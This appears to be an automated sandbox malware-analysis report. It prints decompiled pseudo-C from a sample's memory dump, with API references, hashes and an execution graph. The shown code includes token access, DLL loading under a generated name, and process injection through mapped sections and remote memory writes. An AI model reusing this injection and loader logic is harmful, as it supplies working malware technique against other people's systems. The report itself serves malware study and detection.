						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E049A5FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xbde85000
							E049A7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                                              							__eflags =  *_t134;
                                                                                                                                                                                              							E049A5E80( *_t134,  *_t272);
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							__eflags = _t235;
                                                                                                                                                                                              							if(_t235 != 0) {
                                                                                                                                                                                              								L46:
                                                                                                                                                                                              								__eflags = _t222;
                                                                                                                                                                                              								if(_t222 != 0) {
                                                                                                                                                                                              									_t162 =  *_t272;
                                                                                                                                                                                              									__eflags =  *(_t162 + 4);
                                                                                                                                                                                              									if( *(_t162 + 4) == 0) {
                                                                                                                                                                                              										__eflags = _t235 - _t258;
                                                                                                                                                                                              										if(_t235 <= _t258) {
                                                                                                                                                                                              											goto L49;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								__eflags = _t222 - 4;
                                                                                                                                                                                              								if(_t222 == 4) {
                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						asm("sbb edi, edi");
                                                                                                                                                                                              						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                                              						__eflags = _t271;
                                                                                                                                                                                              						return _t271;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						__eflags = _t218 - 4;
                                                                                                                                                                                              						if(_t218 == 4) {
                                                                                                                                                                                              							goto L34;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t173 =  *_t272;
                                                                                                                                                                                              							__eflags =  *(_t173 + 4);
                                                                                                                                                                                              							if( *(_t173 + 4) != 0) {
                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t88 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              								__eflags = _t254 -  *_t88;
                                                                                                                                                                                              								if(_t254 !=  *_t88) {
                                                                                                                                                                                              									goto L34;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									return 1;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					return 3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}






















































                                                                                                                                                                                              0x049a42a3
                                                                                                                                                                                              0x049a42a5
                                                                                                                                                                                              0x049a42a8
                                                                                                                                                                                              0x049a42ab
                                                                                                                                                                                              0x049a42b3
                                                                                                                                                                                              0x049a42b8
                                                                                                                                                                                              0x049a42b8
                                                                                                                                                                                              0x049a42be
                                                                                                                                                                                              0x049a42c1
                                                                                                                                                                                              0x049a42c4
                                                                                                                                                                                              0x049a42c7
                                                                                                                                                                                              0x049a42c9
                                                                                                                                                                                              0x049a42c9
                                                                                                                                                                                              0x049a42ca
                                                                                                                                                                                              0x049a42ca
                                                                                                                                                                                              0x049a42c7
                                                                                                                                                                                              0x049a42d8
                                                                                                                                                                                              0x049a42db
                                                                                                                                                                                              0x049a42df
                                                                                                                                                                                              0x049a42e4
                                                                                                                                                                                              0x049a42e7
                                                                                                                                                                                              0x049a42ea
                                                                                                                                                                                              0x049a42ea
                                                                                                                                                                                              0x049a42ea
                                                                                                                                                                                              0x049a42ed
                                                                                                                                                                                              0x049a42ed
                                                                                                                                                                                              0x049a42f0
                                                                                                                                                                                              0x049a42f0
                                                                                                                                                                                              0x049a4271
                                                                                                                                                                                              0x049a4271
                                                                                                                                                                                              0x049a4281
                                                                                                                                                                                              0x049a4284
                                                                                                                                                                                              0x049a4289
                                                                                                                                                                                              0x049a4289
                                                                                                                                                                                              0x049a428c
                                                                                                                                                                                              0x049a428f
                                                                                                                                                                                              0x049a4292
                                                                                                                                                                                              0x049a4294
                                                                                                                                                                                              0x049a4294
                                                                                                                                                                                              0x049a42f3
                                                                                                                                                                                              0x049a42f5
                                                                                                                                                                                              0x049a42f8
                                                                                                                                                                                              0x049a42f8
                                                                                                                                                                                              0x049a42fe
                                                                                                                                                                                              0x049a4302
                                                                                                                                                                                              0x049a4305
                                                                                                                                                                                              0x049a4307
                                                                                                                                                                                              0x049a4307
                                                                                                                                                                                              0x049a4318
                                                                                                                                                                                              0x049a431a
                                                                                                                                                                                              0x049a431a
                                                                                                                                                                                              0x049a4322
                                                                                                                                                                                              0x049a4330
                                                                                                                                                                                              0x049a4333
                                                                                                                                                                                              0x049a4335
                                                                                                                                                                                              0x049a4355
                                                                                                                                                                                              0x049a4355
                                                                                                                                                                                              0x049a4358
                                                                                                                                                                                              0x049a435e
                                                                                                                                                                                              0x049a435f
                                                                                                                                                                                              0x049a4362
                                                                                                                                                                                              0x049a4364
                                                                                                                                                                                              0x049a4367
                                                                                                                                                                                              0x049a436a
                                                                                                                                                                                              0x049a436d
                                                                                                                                                                                              0x049a4371
                                                                                                                                                                                              0x049a4374
                                                                                                                                                                                              0x049a4377
                                                                                                                                                                                              0x049a437a
                                                                                                                                                                                              0x049a437c
                                                                                                                                                                                              0x049a437c
                                                                                                                                                                                              0x049a437f
                                                                                                                                                                                              0x049a4381
                                                                                                                                                                                              0x049a4381
                                                                                                                                                                                              0x049a4384
                                                                                                                                                                                              0x049a4386
                                                                                                                                                                                              0x049a4389
                                                                                                                                                                                              0x049a4391
                                                                                                                                                                                              0x049a4394
                                                                                                                                                                                              0x049a4399
                                                                                                                                                                                              0x049a4399
                                                                                                                                                                                              0x049a439f
                                                                                                                                                                                              0x049a43a2
                                                                                                                                                                                              0x049a43a5
                                                                                                                                                                                              0x049a43a7
                                                                                                                                                                                              0x049a43a7
                                                                                                                                                                                              0x049a43a8
                                                                                                                                                                                              0x049a43a8
                                                                                                                                                                                              0x049a43b3
                                                                                                                                                                                              0x049a43b3
                                                                                                                                                                                              0x049a43b3
                                                                                                                                                                                              0x049a43b6
                                                                                                                                                                                              0x049a43b9
                                                                                                                                                                                              0x049a43b9
                                                                                                                                                                                              0x049a43bc
                                                                                                                                                                                              0x049a43bc
                                                                                                                                                                                              0x049a437f
                                                                                                                                                                                              0x049a43bf
                                                                                                                                                                                              0x049a43c2
                                                                                                                                                                                              0x049a43c5
                                                                                                                                                                                              0x049a43c7
                                                                                                                                                                                              0x049a43ca
                                                                                                                                                                                              0x049a43cc
                                                                                                                                                                                              0x049a43cf
                                                                                                                                                                                              0x049a43d2
                                                                                                                                                                                              0x049a43d4
                                                                                                                                                                                              0x049a43d7
                                                                                                                                                                                              0x049a43df
                                                                                                                                                                                              0x049a43e7
                                                                                                                                                                                              0x049a43ea
                                                                                                                                                                                              0x049a43ea
                                                                                                                                                                                              0x049a43ea
                                                                                                                                                                                              0x049a43ed
                                                                                                                                                                                              0x049a43ed
                                                                                                                                                                                              0x049a43ed
                                                                                                                                                                                              0x049a43f0
                                                                                                                                                                                              0x049a43f6
                                                                                                                                                                                              0x049a43f8
                                                                                                                                                                                              0x049a43f8
                                                                                                                                                                                              0x049a43fe
                                                                                                                                                                                              0x049a4404
                                                                                                                                                                                              0x049a440d
                                                                                                                                                                                              0x049a4414
                                                                                                                                                                                              0x049a4416
                                                                                                                                                                                              0x049a4419
                                                                                                                                                                                              0x049a4419
                                                                                                                                                                                              0x049a441c
                                                                                                                                                                                              0x049a441c
                                                                                                                                                                                              0x049a441f
                                                                                                                                                                                              0x049a4421
                                                                                                                                                                                              0x049a4424
                                                                                                                                                                                              0x049a4426
                                                                                                                                                                                              0x049a4441
                                                                                                                                                                                              0x049a4441
                                                                                                                                                                                              0x049a4445
                                                                                                                                                                                              0x049a4448
                                                                                                                                                                                              0x049a444b
                                                                                                                                                                                              0x049a444e
                                                                                                                                                                                              0x049a4464
                                                                                                                                                                                              0x049a4464

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                              • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction ID: 37321376b4ba7d312c040ba6e13c40b4c74187b5590c300c7be1985c200ec0f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: EFD10171A006009FDB24CF6DD9C4A6AB7E5FF88308B24893DE88ACB701D771F9558B95
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499C79E(void* __ecx) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                                                              
                                                                                                                                                                                              				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					_t10 = _v8;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					if(GetLastError() != 0x3f0) {
                                                                                                                                                                                              						L3:
                                                                                                                                                                                              						_t10 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t13 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t10;
                                                                                                                                                                                              			}







                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0499C7B1
                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,0499C8E3,00000000,04990000), ref: 0499C7B8
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0499C8E3,00000000,04990000), ref: 0499C7BF
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,0499C8E3,00000000,04990000), ref: 0499C7E4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1515895013-0
                                                                                                                                                                                              • Opcode ID: c228a17119515786db7bdeb606287fc547c1d05208de12f255e1a8e9951eb9e2
                                                                                                                                                                                              • Instruction ID: 2c0c8ab732ffb4f6cbd627fcd47e2c3d3916ec18a4273431048b32442b70a3c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: c228a17119515786db7bdeb606287fc547c1d05208de12f255e1a8e9951eb9e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: D4F03A72A04215ABDF409FA8DC49B9A7BECFF49340F000870E602E7050E764FE108BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E0499D218(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v140;
                                                                                                                                                                                              				signed char _t14;
                                                                                                                                                                                              				char _t15;
                                                                                                                                                                                              				intOrPtr _t20;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                              				WCHAR* _t34;
                                                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                                                              				struct HINSTANCE__* _t37;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                              				void* _t60;
                                                                                                                                                                                              				void* _t61;
                                                                                                                                                                                              				char _t62;
                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                              				char _t68;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t65 = __esi;
                                                                                                                                                                                              				_t61 = __edi;
                                                                                                                                                                                              				_t47 = __ebx;
                                                                                                                                                                                              				_t50 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              				_t1 = _t50 + 0x1898; // 0x0
                                                                                                                                                                                              				_t14 =  *_t1;
                                                                                                                                                                                              				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                                              					_t15 = E04999DF2(_t50, 0x392);
                                                                                                                                                                                              					_t66 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              					_t62 = _t15;
                                                                                                                                                                                              					_t67 = _t66 + 0xb0;
                                                                                                                                                                                              					_v8 = _t62;
                                                                                                                                                                                              					E04999E51( &_v140, 0x40, L"%08x", E0499E2C5(_t66 + 0xb0, E0499A43D(_t66 + 0xb0), 0));
                                                                                                                                                                                              					_t20 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              					_t7 = _t20 + 0xa8; // 0x1
                                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                                              					_t25 = E04999DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
                                                                                                                                                                                              					_t26 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              					_t68 = E04999A5A(_t26 + 0x1020);
                                                                                                                                                                                              					_v12 = _t68;
                                                                                                                                                                                              					E04998BAF( &_v8);
                                                                                                                                                                                              					_t32 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              					_t34 = E04999A5A(_t32 + 0x122a);
                                                                                                                                                                                              					 *0x49af91c = _t34;
                                                                                                                                                                                              					_t35 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x49ac9a0,  &_v140, ".", L"dll", 0, 0x49ac9a0, _t25, 0x49ac9a0, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                                              					_t37 = LoadLibraryW( *0x49af91c);
                                                                                                                                                                                              					 *0x49af914 = _t37;
                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                              						_t38 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_push(_t37);
                                                                                                                                                                                              						_t60 = 0x28;
                                                                                                                                                                                              						_t38 = E0499F011(0x49acb8c, _t60);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *0x49af918 = _t38;
                                                                                                                                                                                              					E04998BF4( &_v12, 0xfffffffe);
                                                                                                                                                                                              					E04998D6D( &_v140, 0, 0x80);
                                                                                                                                                                                              					if( *0x49af918 != 0) {
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						E04998BF4(0x49af91c, 0xfffffffe);
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					L8:
                                                                                                                                                                                              					if( *0x49af918 == 0) {
                                                                                                                                                                                              						_t46 =  *0x49af850; // 0x4bdf9f0
                                                                                                                                                                                              						 *0x49af918 = _t46;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L10:
                                                                                                                                                                                              					return 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}

























                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID: %08x$dll
                                                                                                                                                                                              • API String ID: 1029625771-2963171978
                                                                                                                                                                                              • Opcode ID: 51e1da1f6685ad4cd0a5ab03e56c10777d328a881a225db5913f4988dbdbdb2d
                                                                                                                                                                                              • Instruction ID: 303ad536729b8240e1c65b5a5a697670e27bf3e7798530f0d4dc2ac5d59a19d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 51e1da1f6685ad4cd0a5ab03e56c10777d328a881a225db5913f4988dbdbdb2d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 023193B1A042047FEF50EA6CEC85F9A77ECEB86318F148135F105D7280DA38AE9587E5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E049A3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                              				char _v5;
                                                                                                                                                                                              				long long _v12;
                                                                                                                                                                                              				short _v20;
                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                              				char _t25;
                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				char** _t32;
                                                                                                                                                                                              				long long _t40;
                                                                                                                                                                                              				long long _t41;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t40 = __fp0;
                                                                                                                                                                                              				_t15 = E049A358D(_a4);
                                                                                                                                                                                              				 *_t32 = "msxml3.dll";
                                                                                                                                                                                              				_t28 = _t15 & 0x0fffffff;
                                                                                                                                                                                              				_t16 = E0499A43D();
                                                                                                                                                                                              				_t26 = 0xf;
                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                              				_v5 = 0;
                                                                                                                                                                                              				if(_t16 > _t26) {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					_t3 = _t25 + 0x41; // 0x41
                                                                                                                                                                                              					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
                                                                                                                                                                                              					_t25 = _t25 + 1;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t26 = _t16;
                                                                                                                                                                                              					if(_t26 != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							goto L2;
                                                                                                                                                                                              						} while (_t25 < _t26);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				lstrlenW( &_v20);
                                                                                                                                                                                              				_t29 = _a8;
                                                                                                                                                                                              				_t22 = _a12 - _t29 + 1;
                                                                                                                                                                                              				_a12 = _t22;
                                                                                                                                                                                              				asm("fild dword [ebp+0x10]");
                                                                                                                                                                                              				if(_t22 < 0) {
                                                                                                                                                                                              					_t40 = _t40 +  *0x49acf58;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_a12 = _t28;
                                                                                                                                                                                              				_v12 = _t40;
                                                                                                                                                                                              				_t41 = _v12;
                                                                                                                                                                                              				asm("fild dword [ebp+0x10]");
                                                                                                                                                                                              				if(_t28 < 0) {
                                                                                                                                                                                              					_t41 = _t41 +  *0x49acf58;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v12 = _t41;
                                                                                                                                                                                              				asm("fmulp st1, st0");
                                                                                                                                                                                              				L049A8935();
                                                                                                                                                                                              				return _t29 - _t22;
                                                                                                                                                                                              			}


















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 049A36BB
                                                                                                                                                                                              • _ftol2_sse.MSVCRT ref: 049A36FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _ftol2_sselstrlen
                                                                                                                                                                                              • String ID: msxml3.dll
                                                                                                                                                                                              • API String ID: 1292649733-2158035192
                                                                                                                                                                                              • Opcode ID: e3d8bcbf15cc672d25620b441da97572636cf1fe907218b7bee629e80530b564
                                                                                                                                                                                              • Instruction ID: 167022f50fe84115f271ef058bfe7272f58a9d225d62fd5492c334c866ab1c82
                                                                                                                                                                                              • Opcode Fuzzy Hash: e3d8bcbf15cc672d25620b441da97572636cf1fe907218b7bee629e80530b564
                                                                                                                                                                                              • Instruction Fuzzy Hash: CA110232A0468DABCF10AF68E8050DE7FB5FF90350F268979DC1592241EB30E57087C1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:4.3%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:420
                                                                                                                                                                                              Total number of Limit Nodes:6
42ad554 NtMapViewOfSection 22652->22654 22653->22654 22657 42ad542 DestroyWindow UnregisterClassA 22653->22657 22654->22655 22662 42ad587 NtMapViewOfSection 22654->22662 22656 42ad6c3 22655->22656 22661 42ad6bf NtUnmapViewOfSection 22655->22661 22658 42ad6cc NtClose 22656->22658 22659 42ad6d7 22656->22659 22657->22654 22658->22659 22659->22597 22659->22602 22661->22656 22662->22655 22663 42ad5ab 22662->22663 22664 42a8c43 RtlAllocateHeap 22663->22664 22665 42ad5bb 22664->22665 22665->22655 22666 42ad5ca VirtualAllocEx WriteProcessMemory 22665->22666 22667 42a8bf4 2 API calls 22666->22667 22668 42ad611 22667->22668 22669 42ad674 lstrlenW 22668->22669 22669->22655 22671 42ad3a2 22670->22671 22672 42ad394 FreeLibrary 22670->22672 22673 42ad3c3 22671->22673 22674 42a8bf4 2 API calls 22671->22674 22672->22671 22673->22408 22674->22673 22675->22634 22676->22638 22717 42a26ec 12 API calls 22690 42a34e1 10 API calls 22707 42a1e66 7 API calls 22727 42a1f65 8 API calls 22740 42a87e5 lstrlenA RtlAllocateHeap 22728 42a377f 18 API calls 22719 42a1ef0 6 API calls 22729 42a334e 14 API calls 22709 42a2a44 37 API calls 22702 42a61c5 97 API calls 22710 82faf0 VirtualAlloc 22695 42a5959 GetLastError 22730 42a3b5d 25 API calls 22685 42a2855 GetLastError RtlAllocateHeap HeapFree memset

Control-flow Graph

C-Code - Quality: 95%
E042AD447(void* __ecx, intOrPtr __edx) {
	void* _v8;
	void* _v12;
	void* _v16;
	void* _v20;
	long _v24;
	long _v28;
	short _v32;
	char _v36;
	intOrPtr* _v40;
	intOrPtr _v44;
	long _v48;
	void* _v52;
	void* _v53;
	char _v64;
	short _v68;
	struct _WNDCLASSEXA _v116;
	char _t81;
	intOrPtr* _t83;
	intOrPtr _t87;
	intOrPtr _t90;
	char _t97;
	short _t98;
	intOrPtr _t105;
	long _t107;
	char _t119;
	void* _t124;
	struct HWND__* _t132;
	void* _t138;
	void* _t147;
	void* _t154;
	intOrPtr _t155;
	intOrPtr _t157;
	void* _t158;
	void* _t163;
	void* _t165;

	_t81 =  *0x42bf81c; // 0x48efbe8
	_t138 = 0;
	_v12 = __ecx;
	_t157 = __edx;
	_v20 = 0;
	_v52 = 0;
	_v48 = 0;
	_v16 = 0;
	_v8 = 0;
	_v24 = 0;
	_v44 = __edx;
	if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
		E042AF0DE(0x1f4);
	}
	_t12 = _t157 + 0x3c; // 0x852c50ff
	_t83 =  *_t12 + _t157;
	_v28 = _t138;
	_v40 = _t83;
	if( *_t83 != 0x4550) {
		L14:
		_t158 = _v12;
		L15:
		if(_v8 != _t138) {
			_t90 =  *0x42bf918; // 0x48ef9f0
			 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
			_v8 = _t138;
		}
		L17:
		if(_v16 != 0) {
			_t87 =  *0x42bf818; // 0x48ef8b0
			NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
		}
		if(_v20 != 0) {
			NtClose(_v20);
		}
		return _v8;
	}
	_v52 =  *((intOrPtr*)(_t83 + 0x50));
	if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
		goto L14;
	}
	_t97 =  *"18293"; // 0x39323831
	_v36 = _t97;
	_t98 =  *0x42bce44; // 0x33
	_v32 = _t98;
	_v116.lpszClassName =  &_v64;
	asm("movsd");
	_v116.lpfnWndProc = DefWindowProcW;
	_v116.cbWndExtra = _t138;
	asm("movsd");
	_v116.style = 0xb;
	_v116.lpszMenuName = _t138;
	_v116.cbSize = 0x30;
	asm("movsb");
